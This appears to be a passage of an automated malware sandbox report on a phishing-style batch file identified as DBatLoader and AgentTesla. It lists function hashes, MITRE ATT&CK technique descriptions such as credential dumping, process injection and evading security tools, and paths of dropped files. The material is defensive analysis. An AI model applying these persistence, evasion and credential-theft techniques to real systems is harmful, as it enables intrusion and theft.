Snapshot File: hcaresult_29_2_1160000_neworigin.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c6b13f0e68fa3f6791061e7ab52cd9f03651e61395ef6a923cf93f990c9af81f
Instruction ID: acc30373a4a3df6f99262ddd5f729e13d40c396bf3065e2fd4d10bf8dd33f088
Opcode Fuzzy Hash: c6b13f0e68fa3f6791061e7ab52cd9f03651e61395ef6a923cf93f990c9af81f
Instruction Fuzzy Hash: DC1123B1C0026A9BDB24CF9AD544BDEFBF5EF48320F14812AD818B7240D378A945CFA5

Function 0692DBD5 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

PHq, xrefs: 0692DD31

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: d08562d911370929b06cd92a5f0ce0961a73d7dc0a53f3ce13178ee680709c9d
Instruction ID: 3ddd1e7fd3c7343c4573e7d75cae1f1338a5e93ba5647e258bb850c3add79696
Opcode Fuzzy Hash: d08562d911370929b06cd92a5f0ce0961a73d7dc0a53f3ce13178ee680709c9d
Instruction Fuzzy Hash: A741C070E0075A9FDF50DF65D8847AEBBB6FF86700F20452AD412EB644DBB19849CB81

Function 069283C8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

$q, xrefs: 06928413

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID: $q
API String ID: 0-1301096350
Opcode ID: d254470133e21af41099bad18c287bdfe7a80dc7a98ebb7479ed0ffa2c119b1a
Instruction ID: 5cb11a81ccd884ec67484be3c6fc2c54047cdfba6f1b494c05b21a7ae9093909
Opcode Fuzzy Hash: d254470133e21af41099bad18c287bdfe7a80dc7a98ebb7479ed0ffa2c119b1a
Instruction Fuzzy Hash: 9FF0DC31A042229BDF649A49FB8176873ACEB40319F248866D904CBA4DC661EE09CBA0

Function 069262E8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77beeb3e1cf4419f009bd1b0a54823f2efe9d84372fdb22da473b92119c19d32
Instruction ID: 65d39a91ef8892bf237cda162f7b12835f87a8fee04d40a319343b54c09ec794
Opcode Fuzzy Hash: 77beeb3e1cf4419f009bd1b0a54823f2efe9d84372fdb22da473b92119c19d32
Instruction Fuzzy Hash: 9761F671F001214FDF549A7DC84069EBAEBAFC5210B294439D40AEB768DEB5ED0287D1

Function 069243B9 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c4277c4ec09673bc98a936466f8e9668f080bb6568af128b405b6bb039e2df
Instruction ID: a88e9d7126da875bd1bee69fa25c06f4292f7c5b34bb71238792b39c5a3229ca
Opcode Fuzzy Hash: c1c4277c4ec09673bc98a936466f8e9668f080bb6568af128b405b6bb039e2df
Instruction Fuzzy Hash: 22816F70B006198FDB54DF68D590BAEBBF7EF89700F208529D40AEB758DA74DC428B91

Function 069246D8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c42328b0d626a7540a7b4b0913c8c0085f5fc4fa45df4b346acc21304616b8b
Instruction ID: 17df4606c9928ec15665e028a4e392072e87c6ba14fb3a5ab5d07a6c500ccc60
Opcode Fuzzy Hash: 8c42328b0d626a7540a7b4b0913c8c0085f5fc4fa45df4b346acc21304616b8b
Instruction Fuzzy Hash: 3E914E34E1021A8FDF60DF68C850BDDB7B5FF89300F208699D549AB255DB70AA85CF91

Function 069246F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd19e0a34ce5b0593197988615891add1cf1b273aa20eed37849d7129376b36a
Instruction ID: cbd2e1bb96502711c1308d90deb1940f64857745e9343aa4879687c6484efbeb
Opcode Fuzzy Hash: cd19e0a34ce5b0593197988615891add1cf1b273aa20eed37849d7129376b36a
Instruction Fuzzy Hash: 4A914C34E1061A8BDF60DF68C890B9DB7B5FF89700F208699D549BB245DB70AA85CF90

Function 06923BB9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859ded30ef52bec8e194e4dc59d224a41535ffa04bec4610b7845be837b8077d
Instruction ID: 7a21395979b7dc6fe19ec848e2387d6f45965aad0e41341206b4814029b18ec2
Opcode Fuzzy Hash: 859ded30ef52bec8e194e4dc59d224a41535ffa04bec4610b7845be837b8077d
Instruction Fuzzy Hash: 8B217A75E012269FDF54DF69E880BAEBBF5AB48700F118129E905E7384D635DD418B90

Function 06923BC8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db80b22f8cdbe5a6e42ee4e1d551550522760e48f194572e79a3d64fea7829f7
Instruction ID: 100e73730f72a92a6987eae704387bc1698eeceea548df2c1f0121e047cb7859
Opcode Fuzzy Hash: db80b22f8cdbe5a6e42ee4e1d551550522760e48f194572e79a3d64fea7829f7
Instruction Fuzzy Hash: 4A216975E0062A9FDF54DF69D880BAEBBF5AB48710F108129E905E7388E735DD408B90

Function 00FDD20C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e490254ac211494acd0410d701ce0aae6604768c0d2dafdca344e72a9ae8bd67
Instruction ID: 312bd0d0d0ea4d34742ff8fddf41a1d066072b171d357d18ef3135c4bd185cc1
Opcode Fuzzy Hash: e490254ac211494acd0410d701ce0aae6604768c0d2dafdca344e72a9ae8bd67
Instruction Fuzzy Hash: 1A2138B2904344DFDB05DF10D8C0B26BB66FB84325F28C56ED8490B345C376D846DAA2

Function 00FDD3BC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 617791c46ab8255a2c109ac478e3eadce4efa508f5f103cdc10d499e83b14ec6
Instruction ID: 0884976787edb542ad5f8b37f2b67e9932e372939eb282fa5f3c4af1bd0566bb
Opcode Fuzzy Hash: 617791c46ab8255a2c109ac478e3eadce4efa508f5f103cdc10d499e83b14ec6
Instruction Fuzzy Hash: 63212975904344DFDB05DF14D5C0B26BB66FB85324F38C56ED80A4B386C376E846DA62

Function 00FDD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e4913294f999f09b9c2836dc48528671ed9d769e397b1a515205c3d5859ef24
Instruction ID: 3f0fdd5f3502405dfbc21fa897ce9a280405b412a8f334a6b0ca28c489b1c048
Opcode Fuzzy Hash: 1e4913294f999f09b9c2836dc48528671ed9d769e397b1a515205c3d5859ef24
Instruction Fuzzy Hash: 62212572904204DFDB14CF20C8C4B26BB66FB84324F28C56EE9490B346C736D846DA62

Function 06926E10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154f7533f950adb6d8985e80dc96b9191d8d884db0d80b20c8e52240afad7580
Instruction ID: a6ea1e3ab780e64b77fffcfdcb937c4ee671e63c13a8b6ab2994234ff4fee5b0
Opcode Fuzzy Hash: 154f7533f950adb6d8985e80dc96b9191d8d884db0d80b20c8e52240afad7580
Instruction Fuzzy Hash: EE21D230F1012A9BCF54EBA9E950BADB7ABEF84310F248525D405EBB49DB30ED5187C0

Function 0692431A Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f676c05ffe62f0bc9ee49bfae4a183ccc6a0a42b941297099fff764a103be2
Instruction ID: 1938dcabb8c6a672d720b9d7ca8910ff0f64feba00266179864981c1fa582cad
Opcode Fuzzy Hash: 70f676c05ffe62f0bc9ee49bfae4a183ccc6a0a42b941297099fff764a103be2
Instruction Fuzzy Hash: BA11F530B042610FDB659A7CD55072EBBEAEFCA710F24843EE089CB35AD965DC0287A1

Function 0692F2C1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048a15739ed718f67eb496974c8a1e6ff78aedc8b85f55649977340a82e05a84
Instruction ID: de34b915ec820fa4211433b7e37f69eb3c10292c164aa1ac84fe0eaa4f456c04
Opcode Fuzzy Hash: 048a15739ed718f67eb496974c8a1e6ff78aedc8b85f55649977340a82e05a84
Instruction Fuzzy Hash: A3014730B005211FCB619EBCD490B2F77EAEBCA310F24843DE50AC7745DA25DC024392

Function 00FDD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 5510bf4bd9acb92c45e8540167998779c6254d795ab06a828e7222a8dc21201e
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 9F119076904244DFDB15CF10D5C4B15BB72FB84324F28C6AAD8494B756C33AD84ADF51

Function 00FDD207 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
Instruction ID: 65059423a7ef244e09fef4b9a4a0c27a632f7d8513028f4cd77b480455c59f84
Opcode Fuzzy Hash: c0f73ed92b59b8f5d5057bc2053e5f8659ab4069548d40049fc97eec44a11b2c
Instruction Fuzzy Hash: 0A119076904284CFDB12CF10D5C4B56BB72FB84324F28C6AAD8494B756C33AD806CBA1

Function 00FDD3B7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3781375790.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_fdd000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: a6478b692dcdbe45a8ff94724d53fdc6741d867ba2e25e99b7cbc0acb67ed9ff
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: 0511BB75904280DFCB12CF10D5C4B15BBA2FB85324F28C6AAD8494B756C33AE80ACBA1

Function 06924328 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c4015b5b86eec5b8e52280c6f18da6b4992a72205bee3a1a131d5d5767060f
Instruction ID: 483ea6a42eac214c8f2696e25aa26cae8b23a420566052f85a0267d7a67e7c9a
Opcode Fuzzy Hash: 30c4015b5b86eec5b8e52280c6f18da6b4992a72205bee3a1a131d5d5767060f
Instruction Fuzzy Hash: 8401AD71B101210BDBA4966DD640B2EB2EAEBC9B10F24843EE50AC7758DD65DC0243A1

Function 0692F2D0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb896dc40f7c7e7c1358a2a9fc01308207a517900d27f0b8ff61d085cff9f89b
Instruction ID: a009b074119616f5f33e0d08c3cae12737bfe1818f73c424ed7addf502117356
Opcode Fuzzy Hash: bb896dc40f7c7e7c1358a2a9fc01308207a517900d27f0b8ff61d085cff9f89b
Instruction Fuzzy Hash: E9012871B105221BDF6595BDA550B2F73EAEBCA710F24843EE10AC7744DE25DC020396

Function 0692FE80 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917e7459390c94f42c79f648ced89b959c72edd53ffac3c3529bb1fa5ca4b6fb
Instruction ID: ebf521bd96258383d8cb50a6b4176a07bda58c832384e788f6c8b635b768d805
Opcode Fuzzy Hash: 917e7459390c94f42c79f648ced89b959c72edd53ffac3c3529bb1fa5ca4b6fb
Instruction Fuzzy Hash: 3601BC71E043298BEB65DBA4C8107FEBAF6BF8D710F140529C442B7A84DFB45980DBA1

Function 0692FF18 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c73e45498ca11c32badf44525ec18b635a93051c091526696de27c8f2ecc58
Instruction ID: 5117e9adf31cece8cbbd73838f9d1650084488c6f21baed99dd21b2c0bf6b592
Opcode Fuzzy Hash: 43c73e45498ca11c32badf44525ec18b635a93051c091526696de27c8f2ecc58
Instruction Fuzzy Hash: 5EF096303092A04FD745A7789864A593FA69F8B700F0640EBE095CF7E3CD558C0587A5

Function 0692FF30 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.3841933871.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_6920000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
Instruction ID: 0d1f1f70ba54a935fc63e1e849a1bc6bdbe1ff08b627b5f70bab07ceabd48e3c
Opcode Fuzzy Hash: c52366154d4257ace21f00c2c67f4d0765caf080cf0084bd7082cda3cb1c98e7
Instruction Fuzzy Hash: 8DE065303000104FD788B768D924B5D3B969FC9B00F0180A9A509CB3E2CDA1DC014BC4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\Public\Libraries\PNO

C:\Users\Public\Libraries\Wisrysxl

C:\Users\Public\Libraries\Wisrysxl.PIF

C:\Users\Public\Libraries\lxsyrsiW.cmd

C:\Users\Public\Libraries\lxsyrsiW.pif

C:\Users\Public\Wisrysxl.url

C:\Users\Public\alpha.pif

C:\Users\Public\xpha.pif

Windows Analysis Report
RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
